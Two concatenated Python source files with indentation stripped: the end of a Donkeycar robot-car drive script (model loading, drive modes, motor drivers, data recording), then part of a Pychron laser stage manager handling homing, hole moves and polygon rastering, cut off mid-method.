assert(cfg.HAVE_IMU)
#Run the pilot if the mode is not user.
inputs=['cam/image_array',
'imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z']
else:
inputs=['cam/image_array']
def load_model(kl, model_path):
start = time.time()
print('loading model', model_path)
kl.load(model_path)
print('finished loading in %s sec.' % (str(time.time() - start)) )
def load_weights(kl, weights_path):
start = time.time()
try:
print('loading model weights', weights_path)
kl.model.load_weights(weights_path)
print('finished loading in %s sec.' % (str(time.time() - start)) )
except Exception as e:
print(e)
print('ERR>> problems loading weights', weights_path)
def load_model_json(kl, json_fnm):
start = time.time()
print('loading model json', json_fnm)
from tensorflow.python import keras
try:
with open(json_fnm, 'r') as handle:
contents = handle.read()
kl.model = keras.models.model_from_json(contents)
print('finished loading json in %s sec.' % (str(time.time() - start)) )
except Exception as e:
print(e)
print("ERR>> problems loading model json", json_fnm)
if model_path:
#When we have a model, first create an appropriate Keras part
kl = dk.utils.get_model_by_type(model_type, cfg,ctr)
model_reload_cb = None
if '.h5' in model_path or '.uff' in model_path or 'tflite' in model_path or '.pkl' in model_path:
#when we have a .h5 extension
#load everything from the model file
load_model(kl, model_path)
def reload_model(filename):
load_model(kl, filename)
model_reload_cb = reload_model
elif '.json' in model_path:
#when we have a .json extension
#load the model from there and look for a matching
#.wts file with just weights
load_model_json(kl, model_path)
weights_path = model_path.replace('.json', '.weights')
load_weights(kl, weights_path)
def reload_weights(filename):
weights_path = filename.replace('.json', '.weights')
load_weights(kl, weights_path)
model_reload_cb = reload_weights
else:
print("ERR>> Unknown extension type on model file!!")
return
#this part will signal visual LED, if connected
V.add(FileWatcher(model_path, verbose=True), outputs=['modelfile/modified'])
#these parts will reload the model file, but only when ai is running so we don't interrupt user driving
V.add(FileWatcher(model_path), outputs=['modelfile/dirty'], run_condition="ai_running")
V.add(DelayedTrigger(100), inputs=['modelfile/dirty'], outputs=['modelfile/reload'], run_condition="ai_running")
V.add(TriggeredCallback(model_path, model_reload_cb), inputs=["modelfile/reload"], run_condition="ai_running")
outputs=['pilot/angle', 'pilot/throttle']
if cfg.TRAIN_LOCALIZER:
outputs.append("pilot/loc")
V.add(kl, inputs=inputs,
outputs=outputs,
run_condition='run_pilot')
if cfg.STOP_SIGN_DETECTOR:
from donkeycar.parts.object_detector.stop_sign_detector import StopSignDetector
V.add(StopSignDetector(cfg.STOP_SIGN_MIN_SCORE, cfg.STOP_SIGN_SHOW_BOUNDING_BOX), inputs=['cam/image_array', 'pilot/throttle'], outputs=['pilot/throttle', 'cam/image_array'])
#Choose what inputs should change the car.
class DriveMode:
def run(self, mode,
user_angle, user_throttle,
pilot_angle, pilot_throttle):
if mode == 'user':
return user_angle, user_throttle
elif mode == 'local_angle':
return pilot_angle if pilot_angle else 0.0, user_throttle
else:
return pilot_angle if pilot_angle else 0.0, pilot_throttle * cfg.AI_THROTTLE_MULT if pilot_throttle else 0.0
V.add(DriveMode(),
inputs=['user/mode', 'user/angle', 'user/throttle',
'pilot/angle', 'pilot/throttle'],
outputs=['angle', 'throttle'])
#to give the car a boost when starting ai mode in a race.
aiLauncher = AiLaunch(cfg.AI_LAUNCH_DURATION, cfg.AI_LAUNCH_THROTTLE, cfg.AI_LAUNCH_KEEP_ENABLED)
V.add(aiLauncher,
inputs=['user/mode', 'throttle'],
outputs=['throttle'])
if isinstance(ctr, JoystickController):
ctr.set_button_down_trigger(cfg.AI_LAUNCH_ENABLE_BUTTON, aiLauncher.enable_ai_launch)
class AiRunCondition:
'''
A bool part to let us know when ai is running.
'''
def run(self, mode):
if mode == "user":
return False
return True
V.add(AiRunCondition(), inputs=['user/mode'], outputs=['ai_running'])
#Ai Recording
class AiRecordingCondition:
'''
return True when ai mode, otherwize respect user mode recording flag
'''
def run(self, mode, recording):
if mode == 'user':
return recording
return True
if cfg.RECORD_DURING_AI:
V.add(AiRecordingCondition(), inputs=['user/mode', 'recording'], outputs=['recording'])
#Drive train setup
if cfg.DONKEY_GYM or cfg.DRIVE_TRAIN_TYPE == "MOCK":
pass
elif cfg.DRIVE_TRAIN_TYPE == "SERVO_ESC":
from donkeycar.parts.actuator import PCA9685, PWMSteering, PWMThrottle
steering_controller = PCA9685(cfg.STEERING_CHANNEL, cfg.PCA9685_I2C_ADDR, busnum=cfg.PCA9685_I2C_BUSNUM)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
throttle_controller = PCA9685(cfg.THROTTLE_CHANNEL, cfg.PCA9685_I2C_ADDR, busnum=cfg.PCA9685_I2C_BUSNUM)
throttle = PWMThrottle(controller=throttle_controller,
max_pulse=cfg.THROTTLE_FORWARD_PWM,
zero_pulse=cfg.THROTTLE_STOPPED_PWM,
min_pulse=cfg.THROTTLE_REVERSE_PWM)
V.add(steering, inputs=['angle'], threaded=True)
V.add(throttle, inputs=['throttle'], threaded=True)
elif cfg.DRIVE_TRAIN_TYPE == "DC_STEER_THROTTLE":
from donkeycar.parts.actuator import Mini_HBridge_DC_Motor_PWM
steering = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_LEFT, cfg.HBRIDGE_PIN_RIGHT)
throttle = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_FWD, cfg.HBRIDGE_PIN_BWD)
V.add(steering, inputs=['angle'])
V.add(throttle, inputs=['throttle'])
elif cfg.DRIVE_TRAIN_TYPE == "DC_TWO_WHEEL":
from donkeycar.parts.actuator import TwoWheelSteeringThrottle, Mini_HBridge_DC_Motor_PWM
left_motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_LEFT_FWD, cfg.HBRIDGE_PIN_LEFT_BWD)
right_motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_RIGHT_FWD, cfg.HBRIDGE_PIN_RIGHT_BWD)
two_wheel_control = TwoWheelSteeringThrottle()
V.add(two_wheel_control,
inputs=['throttle', 'angle'],
outputs=['left_motor_speed', 'right_motor_speed'])
V.add(left_motor, inputs=['left_motor_speed'])
V.add(right_motor, inputs=['right_motor_speed'])
elif cfg.DRIVE_TRAIN_TYPE == "SERVO_HBRIDGE_PWM":
from donkeycar.parts.actuator import ServoBlaster, PWMSteering
steering_controller = ServoBlaster(cfg.STEERING_CHANNEL) #really pin
#PWM pulse values should be in the range of 100 to 200
assert(cfg.STEERING_LEFT_PWM <= 200)
assert(cfg.STEERING_RIGHT_PWM <= 200)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
from donkeycar.parts.actuator import Mini_HBridge_DC_Motor_PWM
motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_FWD, cfg.HBRIDGE_PIN_BWD)
V.add(steering, inputs=['angle'], threaded=True)
V.add(motor, inputs=["throttle"])
elif cfg.DRIVE_TRAIN_TYPE == "MM1":
from donkeycar.parts.robohat import RoboHATDriver
V.add(RoboHATDriver(cfg), inputs=['angle', 'throttle'])
elif cfg.DRIVE_TRAIN_TYPE == "PIGPIO_PWM":
from donkeycar.parts.actuator import PWMSteering, PWMThrottle, PiGPIO_PWM
steering_controller = PiGPIO_PWM(cfg.STEERING_PWM_PIN, freq=cfg.STEERING_PWM_FREQ, inverted=cfg.STEERING_PWM_INVERTED)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
throttle_controller = PiGPIO_PWM(cfg.THROTTLE_PWM_PIN, freq=cfg.THROTTLE_PWM_FREQ, inverted=cfg.THROTTLE_PWM_INVERTED)
throttle = PWMThrottle(controller=throttle_controller,
max_pulse=cfg.THROTTLE_FORWARD_PWM,
zero_pulse=cfg.THROTTLE_STOPPED_PWM,
min_pulse=cfg.THROTTLE_REVERSE_PWM)
V.add(steering, inputs=['angle'], threaded=True)
V.add(throttle, inputs=['throttle'], threaded=True)
# OLED setup
if cfg.USE_SSD1306_128_32:
from donkeycar.parts.oled import OLEDPart
auto_record_on_throttle = cfg.USE_JOYSTICK_AS_DEFAULT and cfg.AUTO_RECORD_ON_THROTTLE
oled_part = OLEDPart(cfg.SSD1306_128_32_I2C_BUSNUM, auto_record_on_throttle=auto_record_on_throttle)
V.add(oled_part, inputs=['recording', 'tub/num_records', 'user/mode'], outputs=[], threaded=True)
#add tub to save data
inputs=['cam/image_array',
'user/angle', 'user/throttle',
'user/mode']
types=['image_array',
'float', 'float',
'str']
if cfg.TRAIN_BEHAVIORS:
inputs += ['behavior/state', 'behavior/label', "behavior/one_hot_state_array"]
types += ['int', 'str', 'vector']
if cfg.CAMERA_TYPE == "D435" and cfg.REALSENSE_D435_DEPTH:
inputs += ['cam/depth_array']
types += ['gray16_array']
if cfg.HAVE_IMU or (cfg.CAMERA_TYPE == "D435" and cfg.REALSENSE_D435_IMU):
inputs += ['imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z']
types +=['float', 'float', 'float',
'float', 'float', 'float']
if cfg.RECORD_DURING_AI:
inputs += ['pilot/angle', 'pilot/throttle']
types += ['float', 'float']
if cfg.HAVE_PERFMON:
from donkeycar.parts.perfmon import PerfMonitor
mon = PerfMonitor(cfg)
perfmon_outputs = ['perf/cpu', 'perf/mem', 'perf/freq']
inputs += perfmon_outputs
types += ['float', 'float', 'float']
V.add(mon, inputs=[], outputs=perfmon_outputs, threaded=True)
# do we want to store new records into own dir or append to existing
tub_path = TubHandler(path=cfg.DATA_PATH).create_tub_path() if \
cfg.AUTO_CREATE_NEW_TUB else cfg.DATA_PATH
tub_writer = TubWriter(tub_path, inputs=inputs, types=types, metadata=meta)
V.add(tub_writer, inputs=inputs, outputs=["tub/num_records"], run_condition='recording')
# Telemetry (we add the same metrics added to the TubHandler
if cfg.HAVE_MQTT_TELEMETRY:
from donkeycar.parts.telemetry import MqttTelemetry
published_inputs, published_types = MqttTelemetry.filter_supported_metrics(inputs, types)
tel = MqttTelemetry(cfg, default_inputs=published_inputs, default_types=published_types)
V.add(tel, inputs=published_inputs, outputs=["tub/queue_size"], threaded=True)
if cfg.PUB_CAMERA_IMAGES:
from donkeycar.parts.network import TCPServeValue
from donkeycar.parts.image import ImgArrToJpg
pub = TCPServeValue("camera")
V.add(ImgArrToJpg(), inputs=['cam/image_array'], outputs=['jpg/bin'])
V.add(pub, inputs=['jpg/bin'])
if type(ctr) is LocalWebController:
if cfg.DONKEY_GYM:
print("You can now go to http://localhost:%d to drive your car." % cfg.WEB_CONTROL_PORT)
else:
print("You can now go to <your hostname.local>:%d to drive your car." % cfg.WEB_CONTROL_PORT)
elif isinstance(ctr, JoystickController):
print("You can now move your joystick to drive your car.")
ctr.set_tub(tub_writer.tub)
ctr.print_controls()
#run the vehicle for 20 seconds
V.start(rate_hz=cfg.DRIVE_LOOP_HZ, max_loop_count=cfg.MAX_LOOPS)
if __name__ == '__main__':
args = docopt(__doc__)
cfg = dk.load_config(myconfig=args['--myconfig'])
if args['drive']:
model_type = args['--type']
camera_type = args['--camera']
drive(cfg, model_path=args['--model'], use_joystick=args['--js'],
model_type=model_type, camera_type=camera_type,
meta=args['--meta'])
elif args['train']:
print('Use python train.py instead.\n')
|
stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import time
from numpy import array, asarray
# =============enthought library imports=======================
from traits.api import DelegatesTo, Instance, \
Button, List, String, Event, Bool
from pychron.canvas.canvas2D.laser_tray_canvas import LaserTrayCanvas
from pychron.core.geometry.convex_hull import convex_hull
from pychron.core.geometry.geometry import sort_clockwise
from pychron.core.geometry.polygon_offset import polygon_offset
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.strtools import csv_to_floats
from pychron.core.ui.preference_binding import bind_preference, ColorPreferenceBinding
from pychron.core.ui.thread import Thread
from pychron.experiment.utilities.position_regex import POINT_REGEX, XY_REGEX, TRANSECT_REGEX
from pychron.hardware.motion_controller import MotionController, \
TargetPositionError, ZeroDisplacementException
from pychron.lasers.points.points_programmer import PointsProgrammer
from pychron.managers.motion_controller_managers.motion_controller_manager \
import MotionControllerManager
from pychron.paths import paths
from pychron.stage.stage_manager import BaseStageManager
def distance_threshold(p1, p2, tol):
if p2 is None:
return True
x1, y1 = p1
x2, y2 = p2
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 > tol
class StageManager(BaseStageManager):
"""
"""
stage_controller_klass = String('Newport')
stage_controller = Instance(MotionController)
points_programmer = Instance(PointsProgrammer)
motion_controller_manager = Instance(MotionControllerManager)
# canvas = Instance(LaserTrayCanvas)
simulation = DelegatesTo('stage_controller')
# stage_map_klass = StageMap
# _stage_map = Instance(StageMap)
# stage_map = Property(depends_on='_stage_map')
# stage_maps = Property(depends_on='_stage_maps')
# _stage_maps = List
# ===========================================================================
# buttons
# ===========================================================================
home = Button('home')
home_option = String('Home All')
home_options = List
manual_override_position_button = Event
ejoystick = Event
joystick_label = String('Enable Joystick')
joystick = Bool(False)
joystick_timer = None
back_button = Button
stop_button = Button('Stop')
_default_z = 0
_cached_position = None
_cached_current_hole = None
_homing = False
def __init__(self, *args, **kw):
"""
"""
super(StageManager, self).__init__(*args, **kw)
self.stage_controller = self._stage_controller_factory()
def measure_grain_polygon(self):
pass
def stop_measure_grain_polygon(self):
pass
def shutdown(self):
self._save_stage_map()
def create_device(self, *args, **kw):
dev = super(StageManager, self).create_device(*args, **kw)
dev.parent = self
return dev
def goto_position(self, v, **kw):
if XY_REGEX[0].match(v):
self._move_to_calibrated_position(v)
elif POINT_REGEX.match(v) or TRANSECT_REGEX[0].match(v):
self.move_to_point(v)
else:
self.move_to_hole(v, user_entry=True, **kw)
def get_current_position(self, **kw):
if self.stage_controller:
x = self.stage_controller.x
y = self.stage_controller.y
return x, y
def get_current_hole(self):
pos = self.get_current_position()
if self.stage_map:
if distance_threshold(pos, self._cached_position, self.stage_map.g_dimension / 4):
h = self.get_calibrated_hole(*pos, tol=self.stage_map.g_dimension / 2.)
if h is not None:
self._cached_current_hole = h
self._cached_position = pos
return self._cached_current_hole
def is_auto_correcting(self):
return False
def bind_preferences(self, pref_id):
bind_preference(self.canvas, 'show_grids', '{}.show_grids'.format(pref_id))
self.canvas.change_grid_visibility()
bind_preference(self.canvas, 'show_laser_position', '{}.show_laser_position'.format(pref_id))
bind_preference(self.canvas, 'show_desired_position', '{}.show_desired_position'.format(pref_id))
bind_preference(self.canvas, 'desired_position_color', '{}.desired_position_color'.format(pref_id),
factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'render_map', '{}.render_map'.format(pref_id))
#
bind_preference(self.canvas, 'crosshairs_kind', '{}.crosshairs_kind'.format(pref_id))
for tag in ('', 'aux_'):
for key in ('line_width', 'color', 'radius', 'offsetx', 'offsety'):
key = '{}crosshairs_{}'.format(tag, key)
factory = ColorPreferenceBinding if key.endswith('color') else None
pref = '{}.{}'.format(pref_id, key)
bind_preference(self.canvas, key, pref, factory=factory)
# bind_preference(self.canvas, '{}crosshairs_line_width', '{}.{}crosshairs_line_width'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_color',
# '{}.crosshairs_color'.format(pref_id),
# factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'crosshairs_radius', '{}.crosshairs_radius'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsetx', '{}.crosshairs_offsetx'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsety', '{}.crosshairs_offsety'.format(pref_id))
bind_preference(self.canvas, 'show_hole_label', '{}.show_hole_label'.format(pref_id))
bind_preference(self.canvas, 'hole_label_color', '{}.hole_label_color'.format(pref_id))
bind_preference(self.canvas, 'hole_label_size', '{}.hole_label_size'.format(pref_id))
self.canvas.handle_hole_label_size(self.canvas.hole_label_size)
bind_preference(self.canvas, 'scaling', '{}.scaling'.format(pref_id))
bind_preference(self.canvas, 'show_bounds_rect',
'{}.show_bounds_rect'.format(pref_id))
self.canvas.request_redraw()
def load(self):
super(StageManager, self).load()
config = self.get_configuration()
if config:
self._default_z = self.config_get(config, 'Defaults', 'z', default=13, cast='float')
self.points_programmer.load_stage_map(self.stage_map_name)
# load the calibration file
# should have calibration files for each stage map
self.tray_calibration_manager.load_calibration()
def finish_loading(self):
self.initialize_stage()
def initialize_stage(self):
self.update_axes()
axes = self.stage_controller.axes
self.home_options = ['Home All', 'XY'] + sorted([axes[a].name.upper() for a in axes])
self.canvas.parent = self
def save_calibration(self, name):
self.tray_calibration_manager.save_calibration(name=name)
# def add_stage_map(self, v):
# sm = self.stage_map_klass(file_path=v)
# psm = self._get_stage_map_by_name(sm.name)
# if psm:
# self._stage_maps.remove(psm)
# self._stage_maps.append(sm)
def accept_point(self):
self.points_programmer.accept_point()
def set_stage_map(self, v):
return self._set_stage_map(v)
def single_axis_move(self, *args, **kw):
return self.stage_controller.single_axis_move(*args, **kw)
def linear_move(self, x, y, use_calibration=True, check_moving=False, abort_if_moving=False, **kw):
if check_moving:
if self.moving():
self.warning('MotionController already in motion')
if abort_if_moving:
self.warning('Move to {},{} aborted'.format(x, y))
return
else:
self.stop()
self.debug('Motion stopped. moving to {},{}'.format(x, y))
pos = (x, y)
if use_calibration:
pos = self.get_calibrated_position(pos)
f = lambda x: '{:0.5f},{:0.5f}'.format(*x)
self.debug('%%%%%%%%%%%%%%%%% mapped {} to {}'.format(f((x, y)), f(pos)))
self.stage_controller.linear_move(*pos, **kw)
def move_to_hole(self, hole, **kw):
if self.stage_map.check_valid_hole(hole, **kw):
self._move(self._move_to_hole, hole, name='move_to_hole', **kw)
def move_to_point(self, pt):
self._move(self._move_to_point, pt, name='move_to_point')
def move_polyline(self, line):
self._move(self._move_to_line, line, name='move_to_line')
def move_polygon(self, poly):
self._move(self._move_polygon, poly, name='move_polygon')
def drill_point(self, pt):
self._move(self._drill_point, pt, name='drill_point')
def set_x(self, value, **kw):
return self.stage_controller.single_axis_move('x', value, **kw)
def set_y(self, value, **kw):
return self.stage_controller.single_axis_move('y', value, **kw)
def set_z(self, value, **kw):
return self.stage_controller.single_axis_move('z', value, **kw)
def set_xy(self, x, y, **kw):
hole = self._get_hole_by_position(x, y)
if hole:
self.move_to_hole(hole)
# self._set_hole(hole.id)
# self.move_to_hole(hole.id)
# self._set_hole(hole.id)
else:
return self.linear_move(x, y, **kw)
def get_hole(self, name):
if self.stage_map:
return self.stage_map.get_hole(name)
def move_to_load_position(self):
"""
"""
x, y, z = self.stage_controller.get_load_position()
self.info('moving to load position, x={}, y={}, z={}'.format(x, y, z))
self.stage_controller.linear_move(x, y, grouped_move=False, block=False)
self.stage_controller.set_z(z)
self.stage_controller.block()
def stop(self, ax_key=None, verbose=False):
self._stop(ax_key, verbose)
def relative_move(self, *args, **kw):
self.stage_controller.relative_move(*args, **kw)
def key_released(self):
sc = self.stage_controller
sc.add_consumable((sc.update_axes, tuple()))
def moving(self, force_query=False, **kw):
moving = False
if force_query:
moving = self.stage_controller.moving(**kw)
elif self.stage_controller.timer is not None:
moving = self.stage_controller.timer.isActive()
return moving
def get_brightness(self, **kw):
return 0
def get_scores(self, **kw):
return 0, 0
def define_home(self, **kw):
self.stage_controller.define_home(**kw)
def get_z(self):
return self.stage_controller._z_position
def get_uncalibrated_xy(self, pos=None):
if pos is None:
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
canvas = self.canvas
ca = canvas.calibration_item
if ca:
pos = self.stage_map.map_to_uncalibration(pos,
ca.center,
ca.rotation,
ca.scale)
return pos
def get_calibrated_xy(self):
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
pos = self.canvas.map_offset_position(pos)
return self.get_calibrated_position(pos)
def get_calibrated_hole(self, x, y, tol):
ca = self.canvas.calibration_item
if ca is not None:
smap = self.stage_map
xx, yy = smap.map_to_uncalibration((x, y), ca.center, ca.rotation)
return next((hole for hole in smap.sample_holes
if abs(hole.x - xx) < tol and abs(hole.y - yy) < tol), None)
def get_hole_xy(self, key):
hole = self.stage_map.get_hole(key)
self.debug('hole {} for {}'.format(hole, key))
if hole:
if hole.has_correction():
pos = hole.corrected_position
style = 'corrected'
else:
style = 'calibrated'
pos = hole.nominal_position
pos = self.get_calibrated_position(pos)
self.debug('using {} position={}'.format(style, pos))
return pos
# pos = self.stage_map.get_corrected_hole_pos(key)
# pos = self.stage_map.get_hole_pos(key)
# self.debug('hole: {} original x,y = {}'.format(key, pos))
# if pos:
# map the position to calibrated space
# pos = self.get_calibrated_position(pos)
# return pos
def finish_move_to_hole(self, user_entry):
pass
# private
def _update_axes(self):
if self.stage_controller:
self.stage_controller.update_axes()
def _home(self):
"""
"""
if self._homing:
return
self._homing = True
if self.home_option == 'Home All':
msg = 'homing all motors'
homed = ['x', 'y', 'z']
home_kwargs = dict(x=-25, y=-25, z=50)
elif self.home_option == 'XY':
msg = 'homing x,y'
homed = ['x', 'y']
home_kwargs = dict(x=-25, y=-25)
else:
# define_home =
msg = 'homing {}'.format(self.home_option)
home_kwargs = {self.home_option: -25 if self.home_option in ['X', 'Y'] else 50}
homed = [self.home_option.lower().strip()]
self.info(msg)
# if define_home:
self.stage_controller.set_home_position(**home_kwargs)
self.stage_controller.home(homed)
# explicitly block
# self.stage_controller.block()
if 'z' in homed and 'z' in self.stage_controller.axes:
# will be a positive limit error in z
# self.stage_controller.read_error()
time.sleep(1)
self.info('setting z to nominal position. {} mm '.format(self._default_z))
self.stage_controller.single_axis_move('z', self._default_z, block=True)
self.stage_controller._z_position = self._default_z
if self.home_option in ['XY', 'Home All']:
time.sleep(0.25)
# the stage controller should think x and y are at -25,-25
self.stage_controller._x_position = -25
self.stage_controller._y_position = -25
self.info('moving to center')
try:
self.stage_controller.linear_move(0, 0, block=True, sign_correct=False)
except TargetPositionError as e:
self.warning_dialog('Move Failed. {}'.format(e))
self._homing = False
def _get_hole_by_position(self, x, y):
if self.stage_map:
return self.stage_map._get_hole_by_position(x, y)
def _get_hole_by_name(self, key):
sm = self.stage_map
return sm.get_hole(key)
# ===============================================================================
# special move
# ===============================================================================
def _stop(self, ax_key=None, verbose=False):
self.stage_controller.stop(ax_key=ax_key, verbose=verbose)
if self.parent.pattern_executor:
self.parent.pattern_executor.stop()
# def _move(self, func, pos, name=None, *args, **kw):
# if pos is None:
# return
#
# if self.move_thread and self.move_thread.isRunning():
# self.stage_controller.stop()
# if name is None:
# name = func.func_name
#
# self.move_thread = Thread(name='stage.{}'.format(name),
# target=func, args=(pos,) + args, kwargs=kw)
# self.move_thread.start()
def _drill_point(self, pt):
zend = pt.zend
vel = pt.velocity
# assume already at zstart
st = time.time()
self.info('start drilling. move to {}. velocity={}'.format(zend, vel))
self.set_z(zend, velocity=vel, block=True)
et = time.time() - st
self.info('drilling complete. drilled for {}s'.format(et))
def _move_polygon(self, pts, velocity=5,
offset=50,
use_outline=True,
find_min=False,
scan_size=None,
use_move=True,
use_convex_hull=True,
motors=None,
verbose=True,
start_callback=None, end_callback=None):
"""
motors is a dict of motor_name:value pairs
"""
if pts is None:
return
if not isinstance(pts, list):
velocity = pts.velocity
use_convex_hull = pts.use_convex_hull
if scan_size is None:
scan_size = pts.scan_size
use_outline = pts.use_outline
offset = pts.offset
find_min = pts.find_min
pts = [dict(xy=(pi.x, pi.y), z=pi.z, ) for pi in pts.points]
# set motors
if motors is not None:
for k, v in motors.values():
'''
motor will not set if it has been locked using set_motor_lock or
remotely using SetMotorLock
'''
if use_move:
self.parent.set_motor(k, v, block=True)
xy = [pi['xy'] for pi in pts]
n = 1000
if scan_size is None:
scan_size = n / 2
# convert points to um
pts = array(xy)
pts *= n
pts = asarray(pts, dtype=int)
'''
sort clockwise ensures consistent offset behavior
a polygon gain have a inner or outer sense depending on order of vertices
always use sort_clockwise prior to any polygon manipulation
'''
pts = sort_clockwise(pts, pts)
sc = self.stage_controller
sc.set_program_mode('absolute')
# do smooth transitions between points
sc.set_smooth_transitions(True)
if use_convex_hull:
pts = convex_hull(pts)
if use_outline:
# calculate new polygon
offset_pts = polygon_offset(pts, -offset)
offset_pts = array(offset_pts, dtype=int)
# polygon offset used 3D vectors.
# trim to only x,y
pts = offset_pts[:, (0, 1)]
# trace perimeter
if use_move:
p0 = xy[0]
self.linear_move(p0[0], p0[1], mode='absolute', block=True)
sc.timer = sc.timer_factory()
if start_callback is not None:
start_callback()
# buf=[]
for pi in xy[1:]:
self.linear_move(pi[0], pi[1],
velocity=velocity,
mode='absolute', set_stage=False)
# finish at first point
self.linear_move(p0[0], p0[1],
velocity=velocity,
mode='absolute', set_stage=False)
sc.block()
self.info('polygon perimeter trace complete')
'''
have the oppurtunity here to turn off laser and change parameters i.e mask
'''
if use_move:
# calculate and step thru scan lines
self._raster(pts, velocity,
step=scan_size,
scale=n,
find_min=find_min,
start_callback=start_callback, end_callback=end_callback,
verbose=verbose)
sc.set_program_mode('relative')
if end_callback is not None:
end_callback()
self.info('polygon raster complete')
def _raster(self, points, velocity,
step=500,
scale=1000,
find_min=False,
start_callback=None, end_callback=None, verbose=False):
from pychron.core.geometry.scan_line import raster
lines = raster(points, step=step, find_min=find_min)
# initialize variables
cnt = 0
direction = 1
flip = False
lasing = False
sc = self.stage_controller
if verbose:
self.info('start raster')
# print lines
# loop thru each scan line
# for yi, xs in lines[::skip]:
for yi, xs in lines:
if direction == -1:
xs = list(reversed(xs))
# convert odd numbers lists to even
n = len(xs)
if n % 2 != 0:
xs = sorted(list(set(xs)))
# traverse each x-intersection pair
n = len(xs)
for i in range(0, n, 2):
if len(xs) <= 1:
continue
x1, x2, yy = xs[i] / scale, xs[i + 1] / scale, yi / scale
if abs(x1 - x2) > 1e-10:
if not lasing:
if verbose:
self.info('fast to {} {},{}'.format(cnt, x1, yy))
self.linear_move(x1, yy,
mode='absolute', set_stage=False,
block=True)
if start_callback is not None:
start_callback()
lasing = True
else:
if verbose:
self.info('slow to {} {},{}'.format(cnt, x1, yy))
sc.timer = sc.timer_factory()
self.linear_move(x1, yy,
mode='absolute', set_stage=False,
velocity=velocity)
if verbose:
self.info('move to {}a {},{}'.format(cnt, x2, yy))
# if n > 2 and not i * 2 >= n:
# line this scan line has more then 1 segment turn off laser at end of segment
if i + 2 < n and not xs[i + 1] == xs[i + 2]:
self.linear_move(x2, yy, velocity=velocity,
mode='absolute', set_stage=False,
block=True)
self.info('wait for move complete')
if end_callback is not None:
end_callback()
lasing = False
else:
self.linear_move(x2, yy, velocity=velocity,
mode='absolute', set_stage=False,
)
cnt += 1
flip = True
else:
flip = False
if flip:
direction *= -1
sc.block()
if verbose:
self.info('end raster')
def _move_polyline(self, pts, start_callback=None, end_callback=None):
if not isinstance(pts, list):
segs = pts.velocity_segments
segs = segs[:1] + segs
pts = [dict(xy=(pi.x, pi.y), z=pi.z, velocity=vi) for vi, pi in
zip(segs, pts.points)]
sc = self.stage_controller
self.linear_move(pts[0]['xy'][0], pts[0]['xy'][1],
update_hole=False,
use_calibration=False,
block=True)
sc.set_z(pts[0]['z'], block=True)
cpos = dict()
# set motors
for motor in ('mask', 'attenuator'):
if motor in pts[0]:
self.parent.set_motor(motor, pts[0][motor])
cpos[motor] = pts[0][motor]
sc.set_program_mode('absolute')
sc.timer = sc.timer_factory()
if start_callback:
start_callback()
npts = pts[1:]
setmotors = dict()
for i, di in enumerate(npts):
xi, yi, zi, vi = di['xy'][0], di['xy'][1], di['z'], di['velocity']
sc.set_z(zi)
block = False
for motor in ('mask', 'attenuator'):
# fix next step sets motor should block
if i + 1 < len(npts):
dii = npts[i + 1]
if motor in dii and dii[motor] != cpos[motor]:
m = self.parent.get_motor(motor)
if not m.locked:
block = True
setmotors[motor] = dii[motor]
self.linear_move(xi, yi, velocity=vi,
block=block,
mode='absolute', # use absolute mode because commands are queued
set_stage=False)
if block:
if end_callback:
end_callback()
for k, v in setmotors.items():
self.parent.set_motor(k, v, block=True)
if start_callback:
start_callback()
# wait until motion complete
sc.block()
if end_callback:
end_callback()
sc.set_program_mode('relative')
# if start and smooth:
# sc.execute_command_buffer()
# sc.end_command_buffer()
# def start_enqueued(self):
# sc = self.stage_controller
# sc.execute_command_buffer()
# sc.end_command_buffer()
def _move_to_point(self, pt):
self.debug('move to point={}'.format(pt))
if isinstance(pt, str):
pt = self.canvas.get_point(pt)
self.debug('move to point canvas pt={}'.format(pt))
if pt is not None:
pos = pt.x, pt.y
self.info('Move to point {}: {:0.5f},{:0.5f},{:0.5f}'.format(pt.identifier,
pt.x, pt.y, pt.z))
self.stage_controller.linear_move(block=True, *pos)
if hasattr(pt, 'z'):
self.stage_controller.set_z(pt.z, block=True)
self.debug('Not setting motors for pt')
# self.parent.set_motors_for_point(pt)
self._move_to_point_hook()
self.info('Move complete')
self.update_axes()
def _move_to_hole(self, key, correct_position=True, user_entry=False, autocenter_only=False):
self.info('Move to hole {} type={}'.format(key, str(type(key))))
autocentered_position = False
if not autocenter_only:
self.temp_hole = key
self.temp_position = self.stage_map.get_hole_pos(key)
pos = self.stage_map.get_corrected_hole_pos(key)
self.info('position {}'.format(pos))
if pos is not None:
if abs(pos[0]) < 1e-6:
pos = self.stage_map.get_hole_pos(key)
